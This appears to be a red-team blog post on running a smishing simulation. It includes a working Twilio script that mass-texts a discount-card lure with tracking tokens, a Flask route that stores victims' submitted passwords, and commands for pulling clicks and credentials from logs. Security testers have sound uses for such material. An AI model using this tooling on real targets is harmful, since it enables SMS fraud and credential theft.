Red Teaming EP2: C2 and Smishing Simulation
This is the second blog post in the series of Red Teaming articles. The first article explains the concept of red teaming and the importance of its presence in day-to-day organizations. Following this, a scenario used to run a phishing campaign was demonstrated. Here the necessary requirements were presented as well as the steps to be taken during and after the campaign.
This article uses the same scenario presented, however, the focus is on the execution of a smishing campaign.
Scenario
There is an organization that will be the target of a smishing attack where the auditors’ main goal is to save the number of clicks on the fake message as well as collect credentials thus adding to the credentials list already collected in the last article.
Requirements
In order to carry out the scenario presented above, some requirements are necessary:
- All requirements from the previous article excluding the Intrusive Awareness platform
- Platform to send SMS
- This platform will be responsible for sending the smishing to all targets
- We will use Twilio but this could be achieved with any other sms’s platforms (Cloudtalk, Vonage, MessageBird, etc)
Architecture
Figure 1: High-level diagram of the social engineering schema.
Setup
Looking at the architecture above we can see that it’s not that different from the previous article.
Now we will have a python script that uses the Twilio API to send messages to our targets. It is important to note that the contact number the python script uses (sender) is provided by Twilio.
Setup Twilio
In order to make Twilio work, there are a couple of steps that need to be done.
- Buy a contact number (that it will be used as the sender number in the python script) (https://support.twilio.com/hc/en-us/articles/223135247-How-to-Search-for-and-Buy-a-Twilio-Phone-Number-from-Console#h_01GKJ4PBV883F5J4XNCB2W2RGK).
- Charge the account with funds that will be spent on sending the messages. Note that the prices of the messages are different as they depend on the origin of the recipient (https://www.twilio.com/sms/pricing/).
Python script
The python script was built with the goal of making use of the Twilio API in order to send SMSes to targets.
In the previous article, we mapped the user clicks by using the email, but in this case, we added a different approach. Before sending the message, a unique token is generated to map who opened the message. This way, every user has a token associated with it.
This token will be part of a new argument in the fake web application URL (www.orgxyz.com/?t=random_token).
import os
import random
import string
import csv
from twilio.rest import Client
from twilio.base.exceptions import TwilioRestException
def get_random_token(lenght: int) -> str:
"""
Returns a random unique token with lowercase with a lenght
"""
with open("tokens.txt") as f:
tokens = f.read().splitlines()
while True:
# Generates a new token but verifies if its unique by reading the tokens.txt
generated_token = "".join(random.choice(string.ascii_lowercase) for i in range(lenght))
if generated_token not in tokens:
with open("tokens.txt", "a") as f:
f.write(generated_token+"\n")
return generated_token
def send_twilio_message(recipient_number: str, token: str) -> int:
"""
Sends twilio message to the recipient_number
"""
account_sid = os.environ['TWILIO_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
url = f"http://orgxyz.com/?t={token}"
client = Client(account_sid, auth_token)
msg_body = f"New Orgxyz card for immediate discounts in several stores! Go to {url} to receive it at your home."
try:
message = client.messages.create(
body= msg_body,
from_ = "CHANGE THIS TO YOUR TWILIO NUMBER",
to=recipient_number
)
return 0
except TwilioRestException as e:
print(e)
return 1
def save_csv(recipient_number: str, token: str, status: str) -> None:
"""
Saves the user,token and status in a csv file
"""
with open("smishing.csv", "a") as f:
writer = csv.writer(f)
writer.writerow([recipient_number, token, status])
def send(numbers_file: str):
print(f"Sending sms")
print("==============================")
with open(numbers_file) as f:
recipient_numbers = f.read().splitlines()
for number in recipient_numbers:
token = get_random_token(8)
if send_twilio_message(number, token) == 0:
print(f"Sent sms to {number} with token({token})")
status = 'sent'
else:
print(f"Error while sending the message to {number}")
status = 'not sent'
save_csv(number, token, status)
def main() -> int:
send("target_numbers.txt")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Edit flask route
Before editing the previously created route we need to create a new table in the database so we can distinguish who authenticated from the phishing phase and who authenticated from the smishing phase. For that, we add a new model in models.py and create a new table in the database.db file.
class UserToken(UserMixin, db.Model):
id_user = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(120), index=True, unique=True)
password = db.Column(db.String(128))
token = db.Column(db.String(128))$ sqlite3 database.db
sqlite> CREATE TABLE user_token (id_user INTEGER PRIMARY KEY AUTOINCREMENT, email TEXT, password TEXT, token TEXT);As we noticed, a new argument to the URL was added in the smishing message (http://orgxyz.com/?t={token}). In order to support this on our fake web application, we need to modify the previous added route to save the opened messages as well as the credentials imputed in the login form. The following code shows the edited route that supports requests that have the “t” argument in the URL.
@app.route("/", methods=["GET", "POST"])
def orgxyz():
form = LoginForm()
if form.validate_on_submit():
if request.args.get("t"):
user_token = UserToken(email = form.email.data, password = form.password.data, token = request.args.get("t"))
db.session.add(user_token)
db.session.commit()
return render_template("orgxyz.html", form=form)
else:
user = User(email = form.email.data,
password = form.password.data)
db.session.add(user)
db.session.commit()
return render_template("orgxyz.html", form=form)
return render_template("orgxyz.html", form=form)
Launching the smishing campaign
Results
Now that the smishing campaign has been launched we can see the clicks made by victims using the nginx logs as well as credentials stored in the respective database.
In order to gather victims’ clicks we can simply get all logs that contain a GET request with the “t” argument.
brun0@debian:/var/log/nginx$ sudo cat access.log | grep "GET /?t"
- [23/Mar/2023:11:15:12 +0000] "GET /?t=123123 HTTP/1.1" 200 39077 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
- [23/Mar/2023:11:21:37 +0000] "GET /?t=x1ga31d3 HTTP/1.1" 200 39074 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
- [23/Mar/2023:11:21:46 +0000] "GET /?t=y4xa41d3 HTTP/1.1" 200 39074 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
- [23/Mar/2023:11:22:00 +0000] "GET /?t=kkxx2d39 HTTP/1.1" 200 39073 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
We can extract the POST requests from the logs that have the “t” argument to gather the authentications from the messages.
brun0@debian:/var/log/nginx$ sudo cat access.log | grep "POST /?t"
- [23/Mar/2023:11:23:29 +0000] "POST /?t=kkxx2d39 HTTP/1.1" 200 39086 "http://orgxyz.com/?t=kkxx2d39" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
- [23/Mar/2023:11:23:53 +0000] "POST /?t=kkxx2d39 HTTP/1.1" 200 39089 "http://orgxyz.com/?t=kkxx2d39" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
Dumping credentials from this stage is the same done in the previous article but now we query the user_token table.
brun0@debian:~/Desktop/flask_app/instance$ sqlite3 database.db
sqlite> select * from user_token;
1|[email protected]|fghjklç|kkxx2d39
2|[email protected]|qwertyuiop|kkxx2d39
Conclusion
In this article we have given the steps to build a smishing campaign while utilizing the already created infrastructure to the phishing campaign.
With this, we were able to trick the users not only by email but also by sms in order to extract more information (clicks and submits) thus realizing the education of target users for a possible social engineering attack.
The next article Series “Red Teaming EP3” is the last one in this series and it will introduce a way to plan and execute USB implant attacks on a targeted organization using again the same web application (C2).
Author
Bruno Teixeira